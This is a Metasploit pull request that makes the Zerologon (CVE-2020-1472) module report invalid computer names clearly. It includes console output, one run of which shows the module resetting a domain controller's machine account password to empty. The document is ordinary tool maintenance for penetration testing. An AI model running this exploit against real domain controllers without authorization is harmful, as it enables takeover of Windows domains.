Update zerologon error handling to output invalid computer name details #16858

Merged

Conversation

adfoster-r7
Contributor

@adfoster-r7 adfoster-r7 commented Aug 3, 2022

Updates the Zerologon module to clearly indicate to the user when the specified remote computer name is invalid

Before

There is a long pause before saying the module didn't work, without any clear indication why:

msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > run 192.168.123.13 nbname=ADF3
[*] Running module against 192.168.123.13

[*] 192.168.123.13: - Connecting to the endpoint mapper service...
[*] 192.168.123.13:49667 - Binding to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.123.13[49667] ...
[*] 192.168.123.13:49667 - Bound to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.123.13[49667] ...
[-] 192.168.123.13:49667 - Auxiliary aborted due to failure: unknown: Failed to authenticate to the server by leveraging the vulnerability
[*] Auxiliary module execution completed

After

The module immediately prompts the user that the computer name is most likely wrong:

msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > run 192.168.123.13 nbname=ADF3
[*] Running module against 192.168.123.13

[*] 192.168.123.13: - Connecting to the endpoint mapper service...
[*] 192.168.123.13:49667 - Binding to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.123.13[49667] ...
[*] 192.168.123.13:49667 - Bound to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.123.13[49667] ...
[-] 192.168.123.13:49667 - Auxiliary aborted due to failure: unexpected-reply: (0xc0000122) STATUS_INVALID_COMPUTER_NAME: Indicates a name that was specified as a remote computer name is syntactically invalid.
[*] Auxiliary module execution completed

Verification

  • Start msfconsole
  • use admin/dcerpc/cve_2020_1472_zerologon
  • Set rhost and nbname to your Windows Domain Controller
  • Verify there are details output when the nbname is wrong

@adfoster-r7 adfoster-r7 force-pushed the update-zerologon-error-handling branch from 94f25bd to 8253e99 Compare August 3, 2022 14:32
@smcintyre-r7 smcintyre-r7 self-assigned this Aug 3, 2022
Contributor

@smcintyre-r7 smcintyre-r7 left a comment

That's a pretty nice improvement.

msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > run
[*] Running module against 192.168.159.96

[*] 192.168.159.96: - Connecting to the endpoint mapper service...
[*] 192.168.159.96:49669 - Binding to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.159.96[49669] ...
[*] 192.168.159.96:49669 - Bound to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.159.96[49669] ...
[+] 192.168.159.96:49669 - Successfully authenticated
[+] 192.168.159.96:49669 - Successfully set the machine account (WIN-3MSP8K2LCGC$) password to: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 (empty)
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) > run NBNAME=FOOOOOO
[*] Running module against 192.168.159.96

[*] 192.168.159.96: - Connecting to the endpoint mapper service...
[*] 192.168.159.96:49669 - Binding to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.159.96[49669] ...
[*] 192.168.159.96:49669 - Bound to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.159.96[49669] ...
[-] 192.168.159.96:49669 - Auxiliary aborted due to failure: unexpected-reply: (0xc0000122) STATUS_INVALID_COMPUTER_NAME: Indicates a name that was specified as a remote computer name is syntactically invalid.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/cve_2020_1472_zerologon) >

@smcintyre-r7 smcintyre-r7 merged commit b42c26b into rapid7:master Aug 3, 2022
@smcintyre-r7
Contributor

Release Notes

This updates zerologon to have better error handling in the check method. This will cause the error from an invalid NetBIOS name to be reported with a meaningful message.

@adfoster-r7 adfoster-r7 deleted the update-zerologon-error-handling branch August 3, 2022 22:50
@bwatters-r7 bwatters-r7 added the rn-modules release notes for new or majorly enhanced modules label Aug 4, 2022
@smcintyre-r7 smcintyre-r7 added rn-enhancement release notes enhancement and removed rn-modules release notes for new or majorly enhanced modules labels Aug 4, 2022